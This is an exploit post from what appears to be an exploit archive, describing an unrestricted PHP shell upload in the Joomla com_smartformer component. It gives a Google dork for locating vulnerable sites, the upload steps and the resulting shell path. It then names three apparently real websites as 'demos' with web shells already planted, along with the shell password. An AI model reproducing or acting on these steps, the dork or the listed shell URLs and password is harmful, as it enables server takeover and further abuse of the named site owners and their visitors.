Home / os / win7

Joomla Component com_smartformer shell upload Vulnerability

Posted on 30 November -0001

<HTML><HEAD><TITLE>Joomla Component com_smartformer shell upload Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>########################## # Exploit Title: Joomla Component com_smartformer shell upload Vulnerability # Dork Google : inurl:"index.php?option=com_smartformer" # We Are Iranian Anonymous # Home: Iranonymous.org # Discovered By: Hacker Khan # Tested on : win ########################### Exploit : Go To # http://localhost/index.php?option=com_smartformer&Itemid=34 # upload shell.php # Your shell : http://localhost/components/com_smartformer/files/x.php ############################ # Demo : # 1) http://www.bmjournal.in/components/com_smartformer/files/x.php # 2) http://www.advancelitho.co.ke/components/com_smartformer/files/x.php # 3) http://www.securesystems.com.au/components/com_smartformer/files/x.php # Shell password => dz0 ############################# #Thanks to : MR.Khatar || ll_azab-siyah_ll || Rising || Blackwolf_Iran ||Ormazd <a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="700c0c231830144007">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script> || MaMaD_Malware|| OnE_H4Ck3R || Shdmehr || B.D Happy Boy || MR.zarvan || Security Soldier || And All Of Iranian Anonymous . # Discovered By: Hacker Khan </BODY></HTML>

 

TOP